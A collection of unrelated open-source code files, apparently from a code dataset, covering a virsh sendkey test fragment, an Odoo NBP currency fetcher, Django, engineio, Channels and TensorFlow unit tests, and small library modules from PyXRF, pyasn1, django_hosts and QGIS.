"grep 'SysRq.*Show State'")
elif "KEY_B" in options:
client_session = vm.wait_for_login()
result = virsh.domstate(vm_name, '--reason', ignore_status=True)
output = result.stdout.strip()
logging.debug("The guest state: %s", output)
if not output.count("booted"):
get_status = 1
else:
get_status = 0
client_session.close()
if get_status == 0:
timeout = -1
else:
session.cmd("echo \"virsh sendkey waiting\" >> /var/log/messages")
time.sleep(1)
timeout = timeout - 1
if get_status != 0:
raise error.TestFail("SysRq does not take effect in guest, "
"options is %s" % options)
else:
logging.info("Succeed to send SysRq command")
else:
raise error.TestFail("Test cfg file invalid: either sysrq_params "
"or create_file_name must be defined")
finally:
if create_file is not None:
session.cmd("rm -rf %s" % create_file)
session.close()
|
dhongu/l10n-romania
|
refs/heads/11.0
|
currency_rate_update/services/update_service_PL_NBP.py
|
1
|
# -*- coding: utf-8 -*-
# © 2009 Camptocamp
# © 2009 Grzegorz Grzelak
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from .currency_getter_interface import CurrencyGetterInterface
from datetime import datetime
from odoo.tools import DEFAULT_SERVER_DATE_FORMAT
import logging
_logger = logging.getLogger(__name__)
class PL_NBPGetter(CurrencyGetterInterface):
"""Implementation of Currency_getter_factory interface
for PL NBP service
"""
code = 'PL_NBP'
name = 'National Bank of Poland'
supported_currency_array = [
"AUD", "BGN", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HRK", "HUF", "IDR", "ILS", "INR", "ISK", "JPY", "KRW",
"LTL", "MXN", "MYR", "NOK", "NZD", "PHP", "PLN", "RON", "RUB", "SEK",
"SGD", "THB", "TRY", "UAH", "USD", "XDR", "ZAR"]
def rate_retrieve(self, dom, ns, curr):
""" Parse a dom node to retrieve
currencies data"""
res = {}
xpath_rate_currency = ("/tabela_kursow/pozycja[kod_waluty='%s']/"
"kurs_sredni/text()") % (curr.upper())
xpath_rate_ref = ("/tabela_kursow/pozycja[kod_waluty='%s']/"
"przelicznik/text()") % (curr.upper())
res['rate_currency'] = float(
dom.xpath(xpath_rate_currency, namespaces=ns)[0].replace(',', '.')
)
res['rate_ref'] = float(dom.xpath(xpath_rate_ref, namespaces=ns)[0])
return res
def get_updated_currency(self, currency_array, main_currency,
max_delta_days):
"""implementation of abstract method of Curreny_getter_interface"""
# LastA.xml is always the most recent one
url = 'http://www.nbp.pl/kursy/xml/LastA.xml'
# We do not want to update the main currency
if main_currency in currency_array:
currency_array.remove(main_currency)
# Move to new XML lib cf Launchpad bug #645263
from lxml import etree
_logger.debug("NBP.pl currency rate service : connecting...")
rawfile = self.get_url(url)
dom = etree.fromstring(rawfile)
ns = {} # Cool, there are no namespaces !
_logger.debug("NBP.pl sent a valid XML file")
rate_date = dom.xpath('/tabela_kursow/data_publikacji/text()',
namespaces=ns)[0]
rate_date_datetime = datetime.strptime(rate_date,
DEFAULT_SERVER_DATE_FORMAT)
self.check_rate_date(rate_date_datetime, max_delta_days)
# We dynamically update supported currencies
self.supported_currency_array = dom.xpath(
'/tabela_kursow/pozycja/kod_waluty/text()',
namespaces=ns
)
self.supported_currency_array.append('PLN')
_logger.debug("Supported currencies = %s" %
self.supported_currency_array)
self.validate_cur(main_currency)
if main_currency != 'PLN':
main_curr_data = self.rate_retrieve(dom, ns, main_currency)
# 1 MAIN_CURRENCY = main_rate PLN
main_rate = (main_curr_data['rate_currency'] /
main_curr_data['rate_ref'])
for curr in currency_array:
self.validate_cur(curr)
if curr == 'PLN':
rate = main_rate
else:
curr_data = self.rate_retrieve(dom, ns, curr)
# 1 MAIN_CURRENCY = rate CURR
if main_currency == 'PLN':
rate = curr_data['rate_ref'] / curr_data['rate_currency']
else:
rate = (main_rate * curr_data['rate_ref'] /
curr_data['rate_currency'])
self.updated_currency[curr] = rate
_logger.debug("Rate retrieved : %s = %s %s" %
(main_currency, rate, curr))
return self.updated_currency, self.log_info
|
youprofit/NewsBlur
|
refs/heads/master
|
apps/recommendations/tests.py
|
1940
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.failUnlessEqual(1 + 1, 2)
__test__ = {"doctest": """
Another way to test that 1 + 1 is equal to 2.
>>> 1 + 1 == 2
True
"""}
|
fogcitymarathoner/djfb
|
refs/heads/master
|
facebook_example/member/tests.py
|
1940
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.failUnlessEqual(1 + 1, 2)
__test__ = {"doctest": """
Another way to test that 1 + 1 is equal to 2.
>>> 1 + 1 == 2
True
"""}
|
NSLS-II-HXN/PyXRF
|
refs/heads/master
|
pyxrf/api.py
|
2
|
# Use this file if you are importing into an interactive IPython session.
# Use 'pyxrf.api_dev' if you are importing PyXRF API into a custom script.
from .api_dev import * # noqa: F401, F403
def pyxrf_api():
r"""
=======================================================================================
Module ``pyxrf.api`` supports the following functions:
Loading data:
make_hdf - load XRF mapping data from databroker
Data processing:
pyxrf_batch - batch processing of XRF maps
build_xanes_map - generation and processing of XANES maps
Dask client:
dask_client_create - returns Dask client for use in batch scripts
Simulation of datasets:
gen_hdf5_qa_dataset - generate quantitative analysis dataset
gen_hdf5_qa_dataset_preset_1 - generate the dataset based on preset parameters
VIEW THIS MESSAGE AT ANY TIME: pyxrf_api()
For more detailed descriptions of the supported functions, type ``help(<function-name>)``
in IPython command prompt.
=========================================================================================
"""
print(pyxrf_api.__doc__)
pyxrf_api()
|
pombredanne/python-engineio
|
refs/heads/master
|
tests/test_socket.py
|
2
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.1
mock_server.ping_interval = 0.1
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = {'threading': threading,
'thread_class': 'Thread',
'queue': queue,
'queue_class': 'Queue',
'websocket': None}
return mock_server
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertTrue(r[0].encode(), b'3abc')
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
mock_server.async['websocket_class'] = 'WebSocket'
mock_ws = mock.MagicMock()
mock_server.async['websocket'].WebSocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async['websocket'].WebSocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertTrue(r[0].encode(), b'6')
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo'),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
time.sleep(0)
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
|
kirca/OpenUpgrade
|
refs/heads/8.0
|
addons/crm_partner_assign/crm_lead.py
|
112
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class crm_lead(osv.osv):
_inherit = 'crm.lead'
def get_interested_action(self, cr, uid, interested, context=None):
try:
model, action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'crm_lead_channel_interested_act')
except ValueError:
raise osv.except_osv(_('Error!'), _("The CRM Channel Interested Action is missing"))
action = self.pool[model].read(cr, uid, [action_id], context=context)[0]
action_context = eval(action['context'])
action_context['interested'] = interested
action['context'] = str(action_context)
return action
def case_interested(self, cr, uid, ids, context=None):
return self.get_interested_action(cr, uid, True, context=context)
def case_disinterested(self, cr, uid, ids, context=None):
return self.get_interested_action(cr, uid, False, context=context)
def assign_salesman_of_assigned_partner(self, cr, uid, ids, context=None):
salesmans_leads = {}
for lead in self.browse(cr, uid, ids, context=context):
if (lead.stage_id.probability > 0 and lead.stage_id.probability < 100) or lead.stage_id.sequence == 1:
if lead.partner_assigned_id and lead.partner_assigned_id.user_id and lead.partner_assigned_id.user_id != lead.user_id:
salesman_id = lead.partner_assigned_id.user_id.id
if salesmans_leads.get(salesman_id):
salesmans_leads[salesman_id].append(lead.id)
else:
salesmans_leads[salesman_id] = [lead.id]
for salesman_id, lead_ids in salesmans_leads.items():
salesteam_id = self.on_change_user(cr, uid, lead_ids, salesman_id, context=None)['value'].get('section_id')
self.write(cr, uid, lead_ids, {'user_id': salesman_id, 'section_id': salesteam_id}, context=context)
|
Kussie/HTPC-Manager
|
refs/heads/master2
|
libs/pyasn1/codec/ber/eoo.py
|
407
|
from pyasn1.type import base, tag
class EndOfOctets(base.AbstractSimpleAsn1Item):
defaultValue = 0
tagSet = tag.initTagSet(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00)
)
endOfOctets = EndOfOctets()
|
pombredanne/django-hosts
|
refs/heads/master
|
django_hosts/tests/hosts/appended.py
|
4
|
from django_hosts import patterns, host
from django_hosts.tests.hosts.simple import host_patterns
host_patterns += patterns('',
host(r'special', 'django_hosts.tests.urls.simple', name='special'),
)
|
ststaynov/fishGame
|
refs/heads/master
|
chat/tests/test_consumers.py
|
9
|
import json
import pytest
from asgiref.inmemory import ChannelLayer as InMemoryChannelLayer
from channels import Group
from channels.handler import AsgiRequest
from channels.message import Message
from django.contrib.sessions.backends.file import SessionStore as FileSessionStore
from chat.consumers import ws_connect, ws_receive, ws_disconnect
from chat.models import Room
@pytest.fixture
def message_factory(settings, tmpdir):
def factory(name, **content):
channel_layer = InMemoryChannelLayer()
message = Message(content, name, channel_layer)
settings.SESSION_FILE_PATH = str(tmpdir)
message.channel_session = FileSessionStore()
return message
return factory
@pytest.mark.django_db
def test_ws_connect(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test',
path = b'/chat/room1',
client = ['10.0.0.1', 12345],
reply_channel = u'test-reply',
)
ws_connect(message)
assert 'test-reply' in message.channel_layer._groups['chat-room1']
assert message.channel_session['room'] == 'room1'
@pytest.mark.django_db
def test_ws_receive(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test',
text = json.dumps({'handle': 'H', 'message': 'M'})
)
# Normally this would happen when the person joins the room, but mock
# it up manually here.
message.channel_session['room'] = 'room1'
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply')
ws_receive(message)
_, reply = message.channel_layer.receive_many([u'test-reply'])
reply = json.loads(reply['text'])
assert reply['message'] == 'M'
assert reply['handle'] == 'H'
@pytest.mark.django_db
def test_ws_disconnect(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test', reply_channel=u'test-reply1')
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply1')
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply2')
message.channel_session['room'] = 'room1'
ws_disconnect(message)
assert 'test-reply1' not in message.channel_layer._groups['chat-room1']
|
rmmariano/ProjScriptsTekton
|
refs/heads/master
|
backend/appengine/routes/meuperfil/home.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from config.template_middleware import TemplateResponse
from gaecookie.decorator import no_csrf
from gaepermission.decorator import login_not_required
__author__ = 'Rodrigo'
@login_not_required
@no_csrf
def index():
return TemplateResponse(template_path='/meuperfil/caixaesquerda/editarmeuperfil.html')
|
pcm17/tensorflow
|
refs/heads/master
|
tensorflow/contrib/framework/python/framework/checkpoint_utils_test.py
|
23
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpoints tools."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
def _create_checkpoints(sess, checkpoint_dir):
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
checkpoint_state_name = "checkpoint"
v1 = variable_scope.get_variable("var1", [1, 10])
v2 = variable_scope.get_variable("var2", [10, 10])
v3 = variable_scope.get_variable("var3", [100, 100])
with variable_scope.variable_scope("useful_scope"):
v4 = variable_scope.get_variable("var4", [9, 9])
sess.run(variables.global_variables_initializer())
v1_value, v2_value, v3_value, v4_value = sess.run([v1, v2, v3, v4])
saver = saver_lib.Saver()
saver.save(
sess,
checkpoint_prefix,
global_step=0,
latest_filename=checkpoint_state_name)
return v1_value, v2_value, v3_value, v4_value
def _create_partition_checkpoints(sess, checkpoint_dir):
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
checkpoint_state_name = "checkpoint"
with variable_scope.variable_scope("scope"):
v1 = variable_scope.get_variable(
name="var1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
sess.run(variables.global_variables_initializer())
v1_value = sess.run(v1._get_variable_list())
saver = saver_lib.Saver()
saver.save(
sess,
checkpoint_prefix,
global_step=0,
latest_filename=checkpoint_state_name)
return v1_value
class CheckpointsTest(test.TestCase):
def testNoCheckpoints(self):
checkpoint_dir = self.get_temp_dir() + "/no_checkpoints"
with self.assertRaises(errors_impl.OpError):
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var1"), [])
def testNoTensor(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_, _, _, _ = _create_checkpoints(session, checkpoint_dir)
with self.assertRaises(errors_impl.OpError):
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var5"), [])
def testGetTensor(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var1"), v1)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var2"), v2)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var3"), v3)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "useful_scope/var4"), v4)
def testGetAllVariables(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_create_checkpoints(session, checkpoint_dir)
self.assertEqual(
checkpoint_utils.list_variables(checkpoint_dir),
[("useful_scope/var4", [9, 9]), ("var1", [1, 10]), ("var2", [10, 10]),
("var3", [100, 100])])
def testInitFromCheckpoint(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable("my1", [1, 10])
with variable_scope.variable_scope("some_other_scope"):
my2 = variable_scope.get_variable("my2", [10, 10])
with variable_scope.variable_scope("other_useful_scope"):
my4 = variable_scope.get_variable("var4", [9, 9])
my3 = variable_scope.get_variable("my3", [100, 100])
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"var1": "some_scope/my1",
"useful_scope/": "some_scope/some_other_scope/other_useful_scope/",
})
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"var2": "some_scope/some_other_scope/my2",
"var3": my3,
})
session.run(variables.global_variables_initializer())
self.assertAllEqual(my1.eval(session), v1)
self.assertAllEqual(my2.eval(session), v2)
self.assertAllEqual(my3.eval(session), v3)
self.assertAllEqual(my4.eval(session), v4)
# Check that tensors are not explicitly in the graph.
self.assertLess(len(str(session.graph.as_graph_def())), 27000)
def testInitFromRootCheckpoint(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable("var1", [1, 10])
my2 = variable_scope.get_variable("var2", [10, 10])
my3 = variable_scope.get_variable("var3", [100, 100])
with variable_scope.variable_scope("useful_scope"):
my4 = variable_scope.get_variable("var4", [9, 9])
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"/": "some_scope/",})
session.run(variables.global_variables_initializer())
self.assertAllEqual(my1.eval(session), v1)
self.assertAllEqual(my2.eval(session), v2)
self.assertAllEqual(my3.eval(session), v3)
self.assertAllEqual(my4.eval(session), v4)
def testInitFromPartitionVar(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1 = _create_partition_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable(
name="my1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my1_var_list = my1._get_variable_list()
with variable_scope.variable_scope("some_other_scope"):
my2 = variable_scope.get_variable(
name="var1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my2_var_list = my2._get_variable_list()
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"scope/var1": "some_scope/my1",
"scope/": "some_other_scope/"})
session.run(variables.global_variables_initializer())
my1_values = session.run(my1_var_list)
self.assertAllEqual(my1_values, v1)
my2_values = session.run(my2_var_list)
self.assertAllEqual(my2_values, v1)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable(
name="my1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my1_var_list = my1._get_variable_list()
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"scope/var1": my1_var_list,})
session.run(variables.global_variables_initializer())
my1_values = session.run(my1_var_list)
self.assertAllEqual(my1_values, v1)
def testInitFromCheckpointMissing(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_, _, _, _ = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
_ = variable_scope.get_variable("my1", [10, 10])
_ = variable_scope.get_variable(
"my2", [1, 10],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer())
# No directory.
with self.assertRaises(errors_impl.OpError):
checkpoint_utils.init_from_checkpoint("no_dir",
{"var1": "some_scope/my1"})
# No variable in checkpoint.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"no_var": "some_scope/my1"})
# No variable in the graph.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"var3": "some_scope/no_var"})
# Shape mismatch.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"var1": "some_scope/my1"})
# Variable 'my1' and 'my2' are missing in given checkpoint scope.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(
checkpoint_dir, {"useful_scope/": "some_scope/"})
# Mapping is not to scope name.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"useful_scope": "some_scope/"})
if __name__ == "__main__":
test.main()
|
asiersarasua/QGIS
|
refs/heads/master
|
python/plugins/processing/gui/__init__.py
|
17
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
__init__.py
---------------------
Date : August 2013
Copyright : (C) 2013 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2013'
__copyright__ = '(C) 2013, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt import uic
import logging
uic.properties.logger.setLevel(logging.WARNING)
uic.uiparser.logger.setLevel(logging.WARNING)
uic.Compiler.qobjectcreator.logger.setLevel(logging.WARNING)
|
xodus7/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distribute/python/estimator_training_test.py
|
6
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
